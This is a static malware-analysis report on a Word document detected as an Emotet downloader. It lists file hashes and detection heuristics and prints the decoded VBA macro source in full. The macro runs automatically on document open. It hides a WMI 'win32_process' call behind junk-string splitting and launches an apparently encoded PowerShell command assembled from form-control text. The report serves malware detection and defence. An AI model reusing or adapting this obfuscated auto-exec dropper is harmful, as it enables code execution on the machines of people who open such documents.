Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 9b514112c082fa73…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 123.1 KB
Created: 2020-01-30 23:28:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-10-01
MD5: 01b9a6cd2fafb5d1a40b177156763af2
SHA-1: c2a01ff585b50f8284815c5c8e473a2b74f76854
SHA-256: 9b514112c082fa73e81892678cd5c8d94b58ecc18596b1388708fd3a331d69d7
Risk score: 230

Heuristics (6)

  • ClamAV: Doc.Downloader.Emotet-7571261-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7571261-0
  • VBA project inside OOXML [medium] (OOXML_VBA), 3 related findings
    Document contains a VBA project (VBA macros present)
  • GetObject call [high] (OLE_VBA_GETOBJ)
    GetObject call
    Matched line in script:
    Set Ijsakakqbmon = GetObject(Vfyqfqslls)
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro [low] (OLE_VBA_DOCOPEN)
    Document_Open macro
    Matched line in script:
    Private Sub Document_open()
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All of the following URLs were found in document text (OOXML body / shared strings):
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/drawing/2016/ink
    • http://schemas.microsoft.com/office/drawing/2017/model3d
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2018/wordml/cex
    • http://schemas.microsoft.com/office/word/2016/wordml/cid
    • http://schemas.microsoft.com/office/word/2018/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 5458 bytes
SHA-256: 8ee7fa1705247ba7d55bf940f96742c7b0280e990fa3de1593988ad357782148
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Znygfcfaofdp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   iewrf = 949
sd = Trim _
(701)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(105)
fe = Trim(Qlttiyeyvuzj)
vfd = Trim("{Polic}")
nxss = Trim _
(49)
Xamqpgpsunk.Qnlrkvkq
End Sub


Attribute VB_Name = "Yxitugqfcmebv"
Attribute VB_Base = "0{B13285D4-5531-4FD9-A202-FA5B592559C9}{8E9D0F30-9C37-41EA-828C-B15D0A559CD5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Pfhpydqhvdo"
Attribute VB_Base = "0{1DBE9F82-F42B-48A2-AB13-0115BCF81B2C}{E5DD9A42-63B2-4DBF-8948-57B77FCA2F5A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Khctescsv()
Debug.Print "Operaion" + NS + "S"
End Sub

Attribute VB_Name = "Xamqpgpsunk"
Function Qnlrkvkq()
   iewrf = 160
sd = Trim _
(159)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(904)
fe = Trim(Nvnosvfpgmru)
vfd = Trim("{Polic}")
nxss = Trim _
(957)
Zjzpajrquqyy = "==/e3n//3^w==/e3n//3^==/e3n//3^==" + "/e3n//3^i==/e3n//3^==/e3n//3^" + "nmg==/e3n//3^mt==/e3n//3^==/e3n//3^" + ChrW(Int(wdKeyS)) + "==/e3n//3^:w==/e3n//3^in==" + "/e3n//3^==/e3n//3^3==/e3n//3^2_" + Yxitugqfcmebv.Pvzphddyxmu + "ro==/e3n//3^ce==/e3n" + "//3^==/e3n//3^s==/e3n//3^s"
   iewrf = 686
sd = Trim _
(132)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(405)
fe = Trim(Qktbycjcehag)
vfd = Trim("{Polic}")
nxss = Trim _
(188)
Vfyqfqslls = Dqsnhaybnak(Zjzpajrquqyy)
   iewrf = 822
sd = Trim _
(294)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(40)
fe = Trim(Lcezclbydwdym)
vfd = Trim("{Polic}")
nxss = Trim _
(275)
Set Ijsakakqbmon = GetObject(Vfyqfqslls)
   iewrf = 231
sd = Trim _
(226)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(644)
fe = Trim(Mtttmqusk)
vfd = Trim("{Polic}")
nxss = Trim _
(277)
Snwirwowq = Yxitugqfcmebv.Lqtowovkqje.Tag
   iewrf = 655
sd = Trim _
(649)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(512)
fe = Trim(Fviocgotmnt)
vfd = Trim("{Polic}")
nxss = Trim _
(628)
Saechkecezpw = Vfyqfqslls + ChrW(Int(wdKeyS)) + Yxitugqfcmebv.Obmcfaqxbbym.Tag + Snwirwowq
   iewrf = 355
sd = Trim _
(400)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(918)
fe = Trim(Tyzholsqtuhr)
vfd = Trim("{Polic}")
nxss = Trim _
(996)
Ryobqqij = Saechkecezpw + Yxitugqfcmebv.Pvzphddyxmu
   iewrf = 279
sd = Trim _
(884)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(59)
fe = Trim(Oijaxbxct)
vfd = Trim("{Polic}")
nxss = Trim _
(931)
Call Ijsakakqbmon. _
Create(Xpkanutse, Hcdvdtuazcp, Czvaqftf(Ryobqqij), Fuzcoaytbsvz, Htxrlssjnjp, Rkdxxqntiqmuj)
   iewrf = 48
sd = Trim _
(864)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(763)
fe = Trim(Jvidadxdm)
vfd = Trim("{Polic}")
nxss = Trim _
(681)
End Function
Function Czvaqftf(Fdsoxfme)
   iewrf = 727
sd = Trim _
(568)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(265)
fe = Trim(Mpkfcutdqi)
vfd = Trim("{Polic}")
nxss = Trim _
(33)
Set Czvaqftf = GetObject(Fdsoxfme)
   iewrf = 130
sd = Trim _
(298)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(337)
fe = Trim(Ejldppoiglv)
vfd = Trim("{Polic}")
nxss = Trim _
(598)
Czvaqftf. _
showwindow = Fjivzemgckdiz + Pmubhiyvx
   iewrf = 45
sd = Trim _
(391)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(748)
fe = Trim(Vrwzbbqmsbs)
vfd = Trim("{Polic}")
nxss = Trim _
(151)
End Function
Function Dqsnhaybnak(Tkzytblabfuul)
   iewrf = 955
sd = Trim _
(430)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(103)
fe = Trim(Dbofmyplae)
vfd = Trim("{Polic}")
nxss = Trim _
(299)
Dqsnhaybnak = Join(Split(Tkzytblabfuul, "==/e3n//3^"), "" + N)
   iewrf = 785
sd = Trim _
(744)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(223)
fe = Trim(Ritgaqhkrw)
vfd = Trim("{Polic}")
nxss = Trim _
(312)
End Function
Function Xpkanutse()
   iewrf = 469
sd = Trim _
(893)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(703)
fe = Trim(Qbjioyxlbmvb)
vfd = Trim("{Polic}")
nxss = Trim _
(120)
Ykgqjwpxvoch = ChrW(Int(wdKeyP))
   iewrf = 806
sd = Trim _
(203)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(297)
fe = Trim(Qupnofjfjel)
vfd = Trim("{Polic}")
nxss = Trim _
(184)
Obcpzknaua = Ykgqjwpxvoch + Yxitugqfcmebv.Wpxsqddgpwl.ControlTipText + "-e "
   iewrf = 918
sd = Trim _
(278)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(181)
fe = Trim(Vrrtanihq)
vfd = Trim("{Polic}")
nxss = Trim _
(569)
dse = Yxitugqfcmebv.Typnpwylqk.ControlTipText
   iewrf = 90
sd = Trim _
(797)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(893)
fe = Trim(Orrudnsweo)
vfd = Trim("{Polic}")
nxss = Trim _
(947)
Xpkanutse = Dqsnhaybnak(Obcpzknaua + StrReverse(dse))
   iewrf = 115
sd = Trim _
(590)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(554)
fe = Trim(Kwrllcznrfy)
vfd = Trim("{Polic}")
nxss = Trim _
(355)
End Function
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 42496 bytes
SHA-256: 690ddabe49b628cb0310187999b65fb2a5df9b9b2ed824ea833b65332c172947
Detection: ClamAV: Doc.Downloader.Emotet-7571261-0
Obfuscation or payload: unlikely